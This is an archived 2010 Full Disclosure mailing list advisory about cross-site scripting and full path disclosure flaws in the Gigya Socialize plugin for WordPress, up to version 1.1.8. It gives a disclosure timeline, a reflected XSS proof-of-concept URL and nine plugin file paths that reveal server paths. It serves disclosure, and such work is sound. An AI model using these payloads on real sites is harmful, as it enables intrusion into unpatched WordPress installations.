Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Vulnerabilities in Gigya Socialize for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 4 Jun 2010 20:14:37 +0300

Hello Full-Disclosure!

I want to warn you about security vulnerabilities in plugin Gigya Socialize
for WordPress.

-----------------------------
Advisory: Vulnerabilities in Gigya Socialize for WordPress
-----------------------------
URL: http://websecurity.com.ua/4153/
-----------------------------
Affected products: Gigya Socialize 1.1.8 and previous versions.
-----------------------------
Timeline:

17.04.2010 - found vulnerabilities.
22.04.2010 - announced at my site.
23.04.2010 - informed developers.
04.06.2010 - disclosed at my site.
-----------------------------
Details:

These are Cross-Site Scripting and Full path disclosure vulnerabilities.

XSS:

http://site/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

XSS takes place in login widget of this plugin.

Full path disclosure:

http://site/wp-content/plugins/gigya-socialize-for-wordpress/gs-for-wordpress.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/login.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/help.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/invite-friends.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/admin/settings.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-connected.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-control.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-not-connected.php

http://site/wp-content/plugins/gigya-socialize-for-wordpress/views/widget/widget-not-logged-in.php

Users of Gigya Socialize plugin for WP must note, that developers of the
plugin didn't respond me and didn't fix the holes (like admins of one
security site, where I found these holes, which fixed only FPD holes, but
not XSS). So users of the plugin must fix it by themselves.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Vulnerabilities in Gigya Socialize for WordPress MustLive (Jun 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]